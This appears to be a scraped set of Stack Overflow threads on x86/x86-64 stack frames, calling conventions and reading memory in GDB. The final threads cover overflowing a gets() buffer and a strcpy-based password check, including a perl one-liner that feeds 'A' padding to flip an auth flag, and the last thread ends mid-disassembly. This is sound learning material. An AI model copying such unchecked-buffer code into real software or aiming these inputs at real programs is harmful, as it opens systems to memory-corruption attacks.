Stack frame creation in 64 bit machine - c

I'm just learning some low level analysis of the programs. In 32 bit compilation with gcc, I found that the stack frame is created in the following order:
Push the function arguments in reverse order.
Save the return address
Save the frame pointer
Create the local variables
So the address of the arguments should be highest, as stack grows in reverse order. But when I tried the same with a 64 bit compilation, I cant understand how it's created, it's just the opposite of what I found in 32 bit compilation. Here is the code and memory details:
void test(int a, int b, int c, int d)
{
int flag;
char buf[10];
num = 100;
}
int main()
{
test(1, 2, 3, 4);
}
Right now for simplicity let's take only the arguments and return address.
32-bit compilation:
0xffffd130: 0x00000001 0xffffd1f4 0xffffd1fc 0xf7e3ad1d
0xffffd140: 0xffffd158 0x0804842d 0x00000001 0x00000002
0xffffd150: 0x00000003 0x00000004 0x00000000 0xf7e22933
0xffffd160: 0x00000001 0xffffd1f4 0xffffd1fc 0xf7fdb6b0
0x08048421 <+30>: mov DWORD PTR [esp],0x1
0x08048428 <+37>: call 0x80483f0 <test>
0x0804842d <+42>: leave
Here everything is proper. I can see the arguments at higher address, immediately followed by the return address 0x0804842d which is at lower address. Now,
64-bit compilation:
0x7fffffffdf80: 0x00000004 0x00000003 0x00000002 0x00000001
0x7fffffffdf90: 0x00400530 0x00000000 0x00400400 0x00000000
0x7fffffffdfa0: 0xffffdfb0 0x00007fff 0x0040052a 0x00000000
0x7fffffffdfb0: 0x00000000 0x00000000 0xf7a3baf5 0x00007fff
0x0000000000400525 <+24>: call 0x4004f0 <test>
0x000000000040052a <+29>: pop rbp
0x000000000040052b <+30>: ret
Here I can see that the arguments are at a lower address and the return address 0x0040052a is at a higher address. What is the problem here? is the stack growing in an opposite direction (lower to higher address) or the creation of stack frame is different from the above mentioned sequence? Please help me to understand. Thanks.

On x86-64 the standard way of passing arguments is through the use of registers, not the stack (unless you got more than 6). See http://www.x86-64.org/documentation/abi.pdf
I highly recommend not doing any kind of experimentation without reading proper documents first (like the one I just linked).
Anyway, you could easily see the arguments were not passed on the stack if you disassembled main:
0x0000000000400509 <+0>: push %rbp
0x000000000040050a <+1>: mov %rsp,%rbp
0x000000000040050d <+4>: mov $0x4,%ecx
0x0000000000400512 <+9>: mov $0x3,%edx
0x0000000000400517 <+14>: mov $0x2,%esi
0x000000000040051c <+19>: mov $0x1,%edi
0x0000000000400521 <+24>: callq 0x4004f0 <test>
0x0000000000400526 <+29>: pop %rbp
0x0000000000400527 <+30>: retq
And you could also see how they end up on the stack within test:
0x00000000004004f0 <+0>: push %rbp
0x00000000004004f1 <+1>: mov %rsp,%rbp
0x00000000004004f4 <+4>: mov %edi,-0x14(%rbp)
0x00000000004004f7 <+7>: mov %esi,-0x18(%rbp)
0x00000000004004fa <+10>: mov %edx,-0x1c(%rbp)
0x00000000004004fd <+13>: mov %ecx,-0x20(%rbp)
0x0000000000400500 <+16>: movl $0x64,-0x4(%rbp)
0x0000000000400507 <+23>: pop %rbp
0x0000000000400508 <+24>: retq

Related

How can I access particular memory address during a GDB session?

This is the disassembly of a very simple C program (strcpy() a constant string and print it):
No symbol table is loaded. Use the "file" command.
Reading symbols from string...done.
(gdb) break 6
Breakpoint 1 at 0x6b8: file string.c, line 6.
(gdb) break 7
Breakpoint 2 at 0x6f2: file string.c, line 7.
(gdb) r
Starting program: /home/wsllnx/Detached/string
Breakpoint 1, main () at string.c:6
6 strcpy(buf, "Memento Mori\n\tInjected_string");
(gdb) disass main
Dump of assembler code for function main:
0x00005555554006b0 <+0>: push %rbp
0x00005555554006b1 <+1>: mov %rsp,%rbp
0x00005555554006b4 <+4>: sub $0x70,%rsp
0x00005555554006b8 <+8>: lea -0x70(%rbp),%rax
0x00005555554006bc <+12>: movabs $0x206f746e656d654d,%rdx
0x00005555554006c6 <+22>: mov %rdx,(%rax)
0x00005555554006c9 <+25>: movabs $0x6e49090a69726f4d,%rcx
0x00005555554006d3 <+35>: mov %rcx,0x8(%rax)
0x00005555554006d7 <+39>: movabs $0x735f64657463656a,%rsi
0x00005555554006e1 <+49>: mov %rsi,0x10(%rax)
0x00005555554006e5 <+53>: movl $0x6e697274,0x18(%rax)
0x00005555554006ec <+60>: movw $0x67,0x1c(%rax)
0x00005555554006f2 <+66>: lea -0x70(%rbp),%rax
0x00005555554006f6 <+70>: mov %rax,%rdi
0x00005555554006f9 <+73>: mov $0x0,%eax
0x00005555554006fe <+78>: callq 0x555555400560 <printf#plt>
0x0000555555400703 <+83>: mov $0x0,%eax
0x0000555555400708 <+88>: leaveq
0x0000555555400709 <+89>: retq
End of assembler dump.
(gdb)
I am currently learning how to fully use GBD and I was wondering:
How can I access particular address like '0x206f746e656d654d'? When I try to do so with x/x or x/s GDB says:
'0x206f746e656d654d: Cannot access memory at address 0x206f746e656d654d'
Same goes for 0x6e49090a69726f4d, 0x735f64657463656a and so on...
Thanks in advance to all the useful answers.
Those aren't actually memory addresses. It's a compiler optimization to represent ASCII values using 64-bit constants. Instead of actually calling strcpy() the compiler is moving the string constant values through registers.
0x206f746e656d654d is the ASCII values for the string 'Memento ' (with a space) in x86 little-endian format.

How to pass parameters to a procedure in assembly?

I have a C program that calls a two procedures from my assembly file, the procedures are defined like this extern int myfunc(int a,int b) and myfunc2(int c,int d) ,now after myfunc call in C, i can access the parameters in assembly like this: b is at [BP+6] and a is at [BP+4] this is in the SMALL MODEL.
Now i want to call myfunc2(int c,int d) but from my assembly file while i'm in my myfunc.
How do i set up the stack for myfunc2 and pass it parameters?
And will it mess up the current stack for myfunc ,if yes how do i deal with that?
MY Assembly file:
.MODEL SMALL
.STACK 100h
.DATA
.CODE
PUBLIC _myfunc
PUBLIC _myfunc2
_myfunc PROC NEAR
.386
PUSH BP
MOV BP,SP
;here i need to do myfun2(1,2)
POP BP
RET
_myfunc ENDP
_myfunc2 PROC NEAR
.386
PUSH BP
MOV BP,SP
MOV DX,[BP+6];get d
MOV AX,[BP+4];get c
ADD AX,DX;add them up
;the return value will be in AX
POP BP
RET
_myfunc2 ENDP
END
MY C file:
#include <stdio.h>
#include <stdlib.h>
extern int myfunc(int a,int b);
extern int myfunc2(int c,int d);
int main()
{
int res;
res=myfunc(int a,int b);
}
You set up the stack by pushing values onto it. The beauty of the stack mechanism is that passing parameters to another function will not mess up the stack of the current function, provided that you do not do anything terribly wrong.
There is no simple answer to your question because a lot depends on the ABI (Application Binary Interface) in use, on the calling convention of your function, (is it cdecl?), etc.
The safest way to go about it is to have your C compiler generate assembly output of your C code, and then do as it does. But in general, it will look like this:
push ax ; pass int c parameter (assuming int is 16-bit)
push dx ; pass int d parameter (assuming int is 16-bit)
call _myfunc2 ; invoke the function
add sp, 4 ; clean up stack (assuming cdecl calling convention)
The above assumes that an int is 16-bit, which is I think reasonable when I hear you speaking of MODEL SMALL.
Because there truly isn't really a simple answer, the best way to go about this is with the gnu debugger, or the docs, but you'll end up in gdb anyway. One way is to write the programs in C, disassemble them, and see for yourself what the calling conventions are. You could use the stack, you could just as easily use registers to pass these simple values as 64-bit typically does and 32-bit syscalls do.
//testc.c
int func2(int c, int d)
{
return c-d;
}
int func(int a, int b)
{
a+=2;
b++;
func2(a,b);
}
//cfile.c
#include <stdio.h>
#include <stdlib.h>
extern int func(int a,int b);
extern int func2(int c,int d);
int main()
{
int res;
int b = 4;
int c = 3;
res=func(b, c);
}
Compiling
$ gcc -m32 -g -c testc.c
unroot#flerb:~/stacko$ gcc -m32 -g cfile.o testc.o -o a.out
unroot#flerb:~/stacko$ ./a.out
unroot#flerb:~/stacko$ echo $?
0
In gdb
$ gdb -q a.out
Reading symbols from a.out...done.
(gdb) set listsize 50
(gdb) list 0
1 #include <stdio.h>
2 #include <stdlib.h>
3
4 extern int func(int a,int b);
5 extern int func2(int c,int d);
6 int main()
7 {
8 int res;
9 int b = 4;
10 int c = 3;
11 res=func(b, c);
12 }
(gdb) break main
Breakpoint 1 at 0x57c: file cfile.c, line 9.
(gdb) run
Starting program: /home/unroot/stacko/a.out
Breakpoint 1, main () at cfile.c:9
9 int b = 4;
Looking at the contents of the stack when we're breaked at main
(gdb) x/20x $esp
0xffffd290: 0x00000001 0xffffd354 0xffffd35c 0x56555611
0xffffd2a0: 0xffffd2c0 0x00000000 0x00000000 0xf7e12276
0xffffd2b0: 0x00000001 0xf7fad000 0x00000000 0xf7e12276
0xffffd2c0: 0x00000001 0xffffd354 0xffffd35c 0x00000000
0xffffd2d0: 0x00000000 0x00000000 0xf7fad000 0xf7ffdc04
Just to have a quick look at the contents before parameters are pushed on
(gdb) x/20x $esp-0x10
0xffffd280: 0x00000003 0x56557000 0x00000001 0x56555577
0xffffd290: 0x00000001 0xffffd354 0xffffd35c 0x56555611
0xffffd2a0: 0xffffd2c0 0x00000000 0x00000000 0xf7e12276
0xffffd2b0: 0x00000001 0xf7fad000 0x00000000 0xf7e12276
0xffffd2c0: 0x00000001 0xffffd354 0xffffd35c 0x00000000
(gdb) disas
Dump of assembler code for function main:
0x56555560 <+0>: lea ecx,[esp+0x4]
0x56555564 <+4>: and esp,0xfffffff0
0x56555567 <+7>: push DWORD PTR [ecx-0x4]
0x5655556a <+10>: push ebp
0x5655556b <+11>: mov ebp,esp
0x5655556d <+13>: push ebx
0x5655556e <+14>: push ecx
0x5655556f <+15>: sub esp,0x10
0x56555572 <+18>: call 0x565555af <__x86.get_pc_thunk.ax>
0x56555577 <+23>: add eax,0x1a89
=> 0x5655557c <+28>: mov DWORD PTR [ebp-0xc],0x4
0x56555583 <+35>: mov DWORD PTR [ebp-0x10],0x3
0x5655558a <+42>: sub esp,0x8
0x5655558d <+45>: push DWORD PTR [ebp-0x10]
0x56555590 <+48>: push DWORD PTR [ebp-0xc]
0x56555593 <+51>: mov ebx,eax
0x56555595 <+53>: call 0x565555c8 <func>
0x5655559a <+58>: add esp,0x10
0x5655559d <+61>: mov DWORD PTR [ebp-0x14],eax
0x565555a0 <+64>: mov eax,0x0
0x565555a5 <+69>: lea esp,[ebp-0x8]
0x565555a8 <+72>: pop ecx
0x565555a9 <+73>: pop ebx
0x565555aa <+74>: pop ebp
0x565555ab <+75>: lea esp,[ecx-0x4]
0x565555ae <+78>: ret
End of assembler dump.
(gdb) break *0x56555595
Breakpoint 2 at 0x56555595: file cfile.c, line 11.
(gdb) cont
Continuing.
Look at contents of stack now, c=3 was pushed on, and then b=4 (notice I'm only writing this like this for ease, the values pushed on are purely values and have no connection with the variables that represent them once they are on the stack)
Breakpoint 2, 0x56555595 in main () at cfile.c:11
11 res=func(b, c);
(gdb) x/20x $esp
0xffffd280: 0x00000004 0x00000003 0x00000001 0x56555577
0xffffd290: 0x00000001 0xffffd354 0x00000003 0x00000004
0xffffd2a0: 0xffffd2c0 0x00000000 0x00000000 0xf7e12276
0xffffd2b0: 0x00000001 0xf7fad000 0x00000000 0xf7e12276
0xffffd2c0: 0x00000001 0xffffd354 0xffffd35c 0x00000000
(gdb)
So the parameters to the func call were pushed in reverse order, push 3 then push 4, evident because the stack is growing downwards to smaller addresses. When the called function accesses these parameters sometimes it will pop 4 off first and then 3 into separate registers using esp, or, as shown under the disassembly below, the called function can access them by pointers from ebp.
(gdb) disas
Dump of assembler code for function main:
0x56555560 <+0>: lea ecx,[esp+0x4]
0x56555564 <+4>: and esp,0xfffffff0
0x56555567 <+7>: push DWORD PTR [ecx-0x4]
0x5655556a <+10>: push ebp
0x5655556b <+11>: mov ebp,esp
0x5655556d <+13>: push ebx
0x5655556e <+14>: push ecx
0x5655556f <+15>: sub esp,0x10
0x56555572 <+18>: call 0x565555af <__x86.get_pc_thunk.ax>
0x56555577 <+23>: add eax,0x1a89
0x5655557c <+28>: mov DWORD PTR [ebp-0xc],0x4
0x56555583 <+35>: mov DWORD PTR [ebp-0x10],0x3
0x5655558a <+42>: sub esp,0x8
0x5655558d <+45>: push DWORD PTR [ebp-0x10]
0x56555590 <+48>: push DWORD PTR [ebp-0xc]
0x56555593 <+51>: mov ebx,eax
=> 0x56555595 <+53>: call 0x565555c8 <func>
0x5655559a <+58>: add esp,0x10
0x5655559d <+61>: mov DWORD PTR [ebp-0x14],eax
0x565555a0 <+64>: mov eax,0x0
0x565555a5 <+69>: lea esp,[ebp-0x8]
0x565555a8 <+72>: pop ecx
0x565555a9 <+73>: pop ebx
0x565555aa <+74>: pop ebp
0x565555ab <+75>: lea esp,[ecx-0x4]
0x565555ae <+78>: ret
End of assembler dump.
Stepping in to func
(gdb) stepi
func (a=4, b=3) at testc.c:9
9 {
(gdb) disas
Dump of assembler code for function func:
=> 0x565555c8 <+0>: push ebp
0x565555c9 <+1>: mov ebp,esp
0x565555cb <+3>: call 0x565555af <__x86.get_pc_thunk.ax>
0x565555d0 <+8>: add eax,0x1a30
0x565555d5 <+13>: add DWORD PTR [ebp+0x8],0x2
0x565555d9 <+17>: add DWORD PTR [ebp+0xc],0x1
0x565555dd <+21>: push DWORD PTR [ebp+0xc]
0x565555e0 <+24>: push DWORD PTR [ebp+0x8]
0x565555e3 <+27>: call 0x565555b3 <func2>
0x565555e8 <+32>: add esp,0x8
0x565555eb <+35>: nop
0x565555ec <+36>: leave
0x565555ed <+37>: ret
End of assembler dump.
The C call function pushed the return value onto the stack without any obvious hint that it was going to do that, but it's there taking up space
(gdb) x/20x $esp
0xffffd27c: 0x5655559a 0x00000004 0x00000003 0x00000001
0xffffd28c: 0x56555577 0x00000001 0xffffd354 0x00000003
0xffffd29c: 0x00000004 0xffffd2c0 0x00000000 0x00000000
0xffffd2ac: 0xf7e12276 0x00000001 0xf7fad000 0x00000000
0xffffd2bc: 0xf7e12276 0x00000001 0xffffd354 0xffffd35c
Then we step forward into the substance of func, where an offset from ebp is used to add 2 to a (the second function pushed onto the stack, which is therefore closer to ebp on the stack) and to add 1 to b which was pushed just before it
(gdb) step
10 a+=2;
(gdb) print/x $ebp
$1 = 0xffffd278
(gdb) x/20x $ebp
0xffffd278: 0xffffd2a8 0x5655559a 0x00000004 0x00000003
0xffffd288: 0x00000001 0x56555577 0x00000001 0xffffd354
0xffffd298: 0x00000003 0x00000004 0xffffd2c0 0x00000000
0xffffd2a8: 0x00000000 0xf7e12276 0x00000001 0xf7fad000
0xffffd2b8: 0x00000000 0xf7e12276 0x00000001 0xffffd354
(gdb) disas
Dump of assembler code for function func:
0x565555c8 <+0>: push ebp
0x565555c9 <+1>: mov ebp,esp
0x565555cb <+3>: call 0x565555af <__x86.get_pc_thunk.ax>
0x565555d0 <+8>: add eax,0x1a30
=> 0x565555d5 <+13>: add DWORD PTR [ebp+0x8],0x2 //a+=2
0x565555d9 <+17>: add DWORD PTR [ebp+0xc],0x1 //b++
0x565555dd <+21>: push DWORD PTR [ebp+0xc] //push b
0x565555e0 <+24>: push DWORD PTR [ebp+0x8] //push a
0x565555e3 <+27>: call 0x565555b3 <func2>
0x565555e8 <+32>: add esp,0x8
0x565555eb <+35>: nop
0x565555ec <+36>: leave
0x565555ed <+37>: ret
End of assembler dump.
Breaking at the call and checking the stack again
(gdb) break *0x565555e3
Breakpoint 3 at 0x565555e3: file testc.c, line 12.
(gdb) cont
Continuing.
Breakpoint 3, 0x565555e3 in func (a=6, b=4) at testc.c:12
12 func2(a,b);
(gdb) disas
Dump of assembler code for function func:
0x565555c8 <+0>: push ebp
0x565555c9 <+1>: mov ebp,esp
0x565555cb <+3>: call 0x565555af <__x86.get_pc_thunk.ax>
0x565555d0 <+8>: add eax,0x1a30
0x565555d5 <+13>: add DWORD PTR [ebp+0x8],0x2
0x565555d9 <+17>: add DWORD PTR [ebp+0xc],0x1
0x565555dd <+21>: push DWORD PTR [ebp+0xc]
0x565555e0 <+24>: push DWORD PTR [ebp+0x8]
=> 0x565555e3 <+27>: call 0x565555b3 <func2>
0x565555e8 <+32>: add esp,0x8
0x565555eb <+35>: nop
0x565555ec <+36>: leave
0x565555ed <+37>: ret
(gdb) x/20x $esp
0xffffd270: 0x00000006 0x00000004 0xffffd2a8 0x5655559a
0xffffd280: 0x00000006 0x00000004 0x00000001 0x56555577
0xffffd290: 0x00000001 0xffffd354 0x00000003 0x00000004
0xffffd2a0: 0xffffd2c0 0x00000000 0x00000000 0xf7e12276
0xffffd2b0: 0x00000001 0xf7fad000 0x00000000 0xf7e12276
Again our variables have been pushed on the stack, again in reverse order, as always, but you could control this too in assembly if you feel like being difficult.
(gdb) stepi
func2 (c=6, d=4) at testc.c:3
3 {
(gdb) disas
Dump of assembler code for function func2:
=> 0x565555b3 <+0>: push ebp
0x565555b4 <+1>: mov ebp,esp
0x565555b6 <+3>: call 0x565555af <__x86.get_pc_thunk.ax>
0x565555bb <+8>: add eax,0x1a45
0x565555c0 <+13>: mov eax,DWORD PTR [ebp+0x8]
0x565555c3 <+16>: sub eax,DWORD PTR [ebp+0xc]
0x565555c6 <+19>: pop ebp
0x565555c7 <+20>: ret
End of assembler dump.
Again the call pushes the return address onto the stack before transfering control to the called function.
(gdb) x/20x $esp
0xffffd26c: 0x565555e8 0x00000006 0x00000004 0xffffd2a8
0xffffd27c: 0x5655559a 0x00000006 0x00000004 0x00000001
0xffffd28c: 0x56555577 0x00000001 0xffffd354 0x00000003
0xffffd29c: 0x00000004 0xffffd2c0 0x00000000 0x00000000
0xffffd2ac: 0xf7e12276 0x00000001 0xf7fad000 0x00000000
Continuing and breaking at the substance of the called function.
(gdb) break *0x565555c0
Breakpoint 4 at 0x565555c0: file testc.c, line 4.
(gdb) cont
Continuing.
Breakpoint 4, func2 (c=6, d=4) at testc.c:4
4 return c-d;
(gdb) disas
Dump of assembler code for function func2:
0x565555b3 <+0>: push ebp
0x565555b4 <+1>: mov ebp,esp
0x565555b6 <+3>: call 0x565555af <__x86.get_pc_thunk.ax>
0x565555bb <+8>: add eax,0x1a45
=> 0x565555c0 <+13>: mov eax,DWORD PTR [ebp+0x8]
0x565555c3 <+16>: sub eax,DWORD PTR [ebp+0xc]
0x565555c6 <+19>: pop ebp
0x565555c7 <+20>: ret
End of assembler dump.
Examining the stack at the substance of func2, where the variables are accessed and the subtraction happens:
(gdb) x/20x $esp
0xffffd268: 0xffffd278 0x565555e8 0x00000006 0x00000004
0xffffd278: 0xffffd2a8 0x5655559a 0x00000006 0x00000004
0xffffd288: 0x00000001 0x56555577 0x00000001 0xffffd354
0xffffd298: 0x00000003 0x00000004 0xffffd2c0 0x00000000
0xffffd2a8: 0x00000000 0xf7e12276 0x00000001 0xf7fad000
(gdb) x/20x $ebp
0xffffd268: 0xffffd278 0x565555e8 0x00000006 0x00000004
0xffffd278: 0xffffd2a8 0x5655559a 0x00000006 0x00000004
0xffffd288: 0x00000001 0x56555577 0x00000001 0xffffd354
0xffffd298: 0x00000003 0x00000004 0xffffd2c0 0x00000000
0xffffd2a8: 0x00000000 0xf7e12276 0x00000001 0xf7fad000
So here [ebp+0x8] = 6 and [ebp+0xc] = 4 and the values are modified with the subtract instruction in the eax register, returning the result into the eax register.
Default convention for C is to let the caller push the return address prior to transferring control to the callee, and have the callee adjust the stack and base pointers, but you can do whatever you want when you're calling your own function and returning to your own function. Here I used C programs to illustrate what C does, but if you're using C to call an assembly program which calls another assembly program then you have explicit control of the base pointer between those assembly programs if you want it. You can chose to adjust them manually and jmp to your second function call, which will circumvent the automatic call procedure of pushing the return address and setting up the stack, not entirely useful; or the assembly call instruction will use the same procedure to initialize the called function and you can expect the offsets to be the same as in C functions.
Good link on x86 Call conventions including cdecl and stdcall
and
A handy syscall reference showing use of registers for function calls
This is a simple example of using registers to pass variables in 32 bit, no stack necessary.
//testasm32.asm
section .text
global _start
_start:
mov ecx, hello1
call print_string
mov ecx, hello2
call print_string
mov eax, 1
int 0x80
print_string:
mov eax, 4
mov ebx, 1
mov edx, 6
int 0x80
ret
section .data
hello1 db "Hello1"
hello2 db "Hello2"
$ nasm -f elf32 testasm32.asm
unroot#flerb:~/LearningLinuxBinaryAnalysis_Code$ ld -m elf_i386 -o testasm32 testasm32.o
unroot#flerb:~/LearningLinuxBinaryAnalysis_Code$ ./testasm32
Hello1Hello2
$ echo $?
1
Interestingly ebx holds the error code for the exit syscall, so it returns 1 because ebx was set to 1 in the print_string command and was not cleared.

Can not find return address in gdb

I wrote that program in C (just for debugging purposes):
void return_input(void)
{
char array[10];
gets(array);
printf("%s\n", array);
}
main()
{
return_input();
return 0;
}
I have been experimenting with stack overflows, and since I am working with a 64 bit machine I compiled it with
gcc -m32 -mpreferred-stack-boundary=2 -ggdb overflow.c -o overflow
I then debugged the program with gdb, and disassembled the return_input function, I got:
0x0804841b <+0>: push %ebp
0x0804841c <+1>: mov %esp,%ebp
0x0804841e <+3>: sub $0xc,%esp
0x08048421 <+6>: lea -0xa(%ebp),%eax
0x08048424 <+9>: push %eax
0x08048425 <+10>: call 0x80482e0 <gets#plt>
0x0804842a <+15>: add $0x4,%esp
0x0804842d <+18>: lea -0xa(%ebp),%eax
0x08048430 <+21>: push %eax
0x08048431 <+22>: call 0x80482f0 <puts#plt>
0x08048436 <+27>: add $0x4,%esp
0x08048439 <+30>: nop
0x0804843a <+31>: leave
0x0804843b <+32>: ret
This marks that the return address should be 0x0804843b (or is it not?) However, when examining the esp (remember this is a 32bit compiled program on a 64bit machine) with x/20x $esp (after setting a breakpoint at the gets function and the ret), I can't find the return address:
0xffffd400: 0xffffd406 0x080481ec 0x08048459 0x00000000
0xffffd410: 0xffffd418 0x08048444 0x00000000 0xf7e195f7
0xffffd420: 0x00000001 0xffffd4b4 0xffffd4bc 0x00000000
0xffffd430: 0x00000000 0x00000000 0xf7fb0000 0xf7ffdc04
0xffffd440: 0xf7ffd000 0x00000000 0xf7fb0000 0xf7fb0000
Why can't I see the return address? Sorry for the long question. Thanks in advance
0x0804843b is 'ret'. It seems you confused that with 'return address'. The return address is the address of the next instruction to execute in the calling function. In particular for this code:
0x08048425 <+10>: call 0x80482e0 <gets#plt>
0x0804842a <+15>: add $0x4,%esp
The return address is 0x0804842a.
Now, it is unclear what exactly did you do. Compiling as you specified, doing 'break gets' + 'run' works just fine for me. Are you sure you are dumping regs from "within" gets?
(gdb) disassemble return_input
Dump of assembler code for function return_input:
0x0804843b <+0>: push %ebp
0x0804843c <+1>: mov %esp,%ebp
0x0804843e <+3>: sub $0xc,%esp
0x08048441 <+6>: lea -0xa(%ebp),%eax
0x08048444 <+9>: push %eax
0x08048445 <+10>: call 0x8048300 <gets#plt>
0x0804844a <+15>: add $0x4,%esp
That's the instruction gets should return to.
0x0804844d <+18>: lea -0xa(%ebp),%eax
0x08048450 <+21>: push %eax
0x08048451 <+22>: call 0x8048310 <puts#plt>
0x08048456 <+27>: add $0x4,%esp
0x08048459 <+30>: nop
0x0804845a <+31>: leave
0x0804845b <+32>: ret
End of assembler dump.
(gdb) break gets
Breakpoint 1 at 0x8048300
(gdb) run
[..]
Breakpoint 1, 0xf7e3a005 in gets () from /lib/libc.so.6
(gdb) x/20x $esp
0xffffd160: 0x00000001 0xf7fa3000 0xffffd180 0x0804844a
And here it is on the 4th spot.
0xffffd170: 0xffffd176 0x0804820c 0x08048479 0x00000000
0xffffd180: 0xffffd188 0x08048464 0x00000000 0xf7df15a6
0xffffd190: 0x00000001 0xffffd224 0xffffd22c 0x00000000
0xffffd1a0: 0x00000000 0x00000000 0xf7fa3000 0xf7ffdbe4
(gdb)

Using the command 'x/20x $esp' in GDB, how does the stack work?

I wrote a simple program in C to be analysed in GDB
#include <stdio.h>
int add_numbers(int n1,int n2)
{
int sum=n1+n2;
return sum;
}
int main()
{
int n1=1;
int n2=2;
int sum;
sum = add_numbers(n1,n2);
printf("The sum of 1 and 2 is %d",sum);
return 0;
}
Here is the disassembly of main
0x08048433 <+0>: push %ebp
0x08048434 <+1>: mov %esp,%ebp
0x08048436 <+3>: and $0xfffffff0,%esp
0x08048439 <+6>: sub $0x20,%esp
0x0804843c <+9>: movl $0x1,0x14(%esp)
0x08048444 <+17>: movl $0x2,0x18(%esp)
0x0804844c <+25>: mov 0x18(%esp),%eax
0x08048450 <+29>: mov %eax,0x4(%esp)
0x08048454 <+33>: mov 0x14(%esp),%eax
0x08048458 <+37>: mov %eax,(%esp)
0x0804845b <+40>: call 0x804841d <add_numbers>
0x08048460 <+45>: mov %eax,0x1c(%esp)
0x08048464 <+49>: mov 0x1c(%esp),%eax
0x08048468 <+53>: mov %eax,0x4(%esp)
0x0804846c <+57>: movl $0x8048510,(%esp)
0x08048473 <+64>: call 0x80482f0 <printf#plt>
0x08048478 <+69>: mov $0x0,%eax
0x0804847d <+74>: leave
0x0804847e <+75>: ret
I then set a breakpoint on line 12 and analysed the stack with
'x/20x $esp'
0xbffff270: 0x00000001 0xbffff334 0xbffff33c 0xb7e4342d
0xbffff280: 0xb7fbb3c4 0x00000001 0x0804848b 0xb7fbb000
0xbffff290: 0x08048480 0x00000000 0x00000000 0xb7e29a83
0xbffff2a0: 0x00000001 0xbffff334 0xbffff33c 0xb7feccea
0xbffff2b0: 0x00000001 0xbffff334 0xbffff2d4 0x0804a014
So why is it that the statement 'movl $0x1,0x14(%esp)' moves 1 to the second address in the stack? Specifically how is this stack incremented(or decremented because the stack grows down?) to put '1' in the address following the'$eip' register?
A tutorial would be nice too since I’ve probably missed this information.
Thanks!
-Tom
The assembly instruction movl $0x1,0x14(%esp) moves the 32-bit integer value 1 into the 4 bytes located 20 bytes past the address that the register ESP points to. In your memory dump that would be the four bytes starting at 0xbffff284, which is the second 32-bit value on the second line.
This instruction doesn't change the value of ESP. It's neither incremented nor decremented. The value in ESP changed previously by the instruction at 0x08048439: sub $0x20,%esp. This instruction reserves 32-bytes on the stack for local variables used by the function, along with outgoing arguments for function calls. The variables n1, n2, and sum are located at addresses 0xbffff284, 0xbffff288, and 0xbffff28c respectively.
Nothing is stored at the address following EIP anywhere in your program. I assume you actually meant something else by this, but I don't know what.

Attempting a buffer overflow

I am attempting to change the result of a function using a buffer overflow to change the results on the stack with the following code:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int check_auth1(char *password)
{
char password_buffer[8];
int auth_flag = 0;
strcpy(password_buffer, password);
if (strcmp(password_buffer, "cup") == 0) {
auth_flag = 1;
}
return auth_flag;
}
int main(int argc, char **argv)
{
if (argc < 2) {
printf("Usage: %s <password>\n", argv[0]);
exit(0);
}
int authenticated = check_auth1(argv[1]);
if (authenticated != 1) {
printf("NOT Allowed.\n");
} else {
printf("Allowed.\n");
}
return 0;
}
I'm using gdb to analyse the stack and this is what I have:
0xbffff6d0: 0xbffff8e4 0x0000002f 0xbffff72c 0xb7fd0ff4
0xbffff6e0: 0x08048540 0x08049ff4 0x00000002 0x0804833d
0xbffff6f0: 0x00000000 0x00000000 0xbffff728 0x0804850f
0xbffff700: 0xbffff901 0xb7e5e196 0xb7fd0ff4 0xb7e5e225
0xbffff710: 0xb7fed280 0x00000000 0x08048549 0xb7fd0ff4
0xbffff720: 0x08048540 0x00000000 0x00000000 0xb7e444d3
0xbffff730: 0x00000002 0xbffff7c4 0xbffff7d0 0xb7fdc858
0xbffff740: 0x00000000 0xbffff71c 0xbffff7d0 0x00000000
[1] $ebp 0xbffff6f8
[2] $esp 0xbffff6d0
[3] password 0xbffff700
[4] auth_flag 0xbffff6ec
[5] password_buffer 0xbffff6e4
0x080484ce <+0>: push %ebp
0x080484cf <+1>: mov %esp,%ebp
0x080484d1 <+3>: and $0xfffffff0,%esp
0x080484d4 <+6>: sub $0x20,%esp
0x080484d7 <+9>: cmpl $0x1,0x8(%ebp)
0x080484db <+13>: jg 0x80484ff <main+49>
0x080484dd <+15>: mov 0xc(%ebp),%eax
0x080484e0 <+18>: mov (%eax),%edx
0x080484e2 <+20>: mov $0x8048614,%eax
0x080484e7 <+25>: mov %edx,0x4(%esp)
0x080484eb <+29>: mov %eax,(%esp)
0x080484ee <+32>: call 0x8048360 <printf#plt>
0x080484f3 <+37>: movl $0x0,(%esp)
0x080484fa <+44>: call 0x80483a0 <exit#plt>
0x080484ff <+49>: mov 0xc(%ebp),%eax
0x08048502 <+52>: add $0x4,%eax
0x08048505 <+55>: mov (%eax),%eax
0x08048507 <+57>: mov %eax,(%esp)
----------
IMPORTANT STUFF STARTS NOW
0x0804850a <+60>: call 0x8048474 <check_auth1>
0x0804850f <+65>: mov %eax,0x1c(%esp)
0x08048513 <+69>: cmpl $0x1,0x1c(%esp)
0x08048518 <+74>: je 0x8048528 <main+90>
I determined how far apart $ebp is from &password_buffer: 0xbffff6f8 - 0xbffff6e4 = 14 bytes
So with 14 'A' input, i.e. ./stackoverflowtest $(perl -e 'print "A" x 14') it should take me to "Allowed".
Where am I going wrong? What is the needed input to cause a overflow?
ASLR and gcc canaries are turned off.
check_auth1 assembly dump:
Dump of assembler code for function check_auth1:
0x08048474 <+0>: push %ebp
0x08048475 <+1>: mov %esp,%ebp
0x08048477 <+3>: push %edi
0x08048478 <+4>: push %esi
0x08048479 <+5>: sub $0x20,%esp
=> 0x0804847c <+8>: movl $0x0,-0xc(%ebp)
0x08048483 <+15>: mov 0x8(%ebp),%eax
0x08048486 <+18>: mov %eax,0x4(%esp)
0x0804848a <+22>: lea -0x14(%ebp),%eax
0x0804848d <+25>: mov %eax,(%esp)
0x08048490 <+28>: call 0x8048370 <strcpy#plt>
0x08048495 <+33>: lea -0x14(%ebp),%eax
0x08048498 <+36>: mov %eax,%edx
0x0804849a <+38>: mov $0x8048610,%eax
0x0804849f <+43>: mov $0x4,%ecx
0x080484a4 <+48>: mov %edx,%esi
0x080484a6 <+50>: mov %eax,%edi
0x080484a8 <+52>: repz cmpsb %es:(%edi),%ds:(%esi)
0x080484aa <+54>: seta %dl
0x080484ad <+57>: setb %al
0x080484b0 <+60>: mov %edx,%ecx
0x080484b2 <+62>: sub %al,%cl
0x080484b4 <+64>: mov %ecx,%eax
0x080484b6 <+66>: movsbl %al,%eax
0x080484b9 <+69>: test %eax,%eax
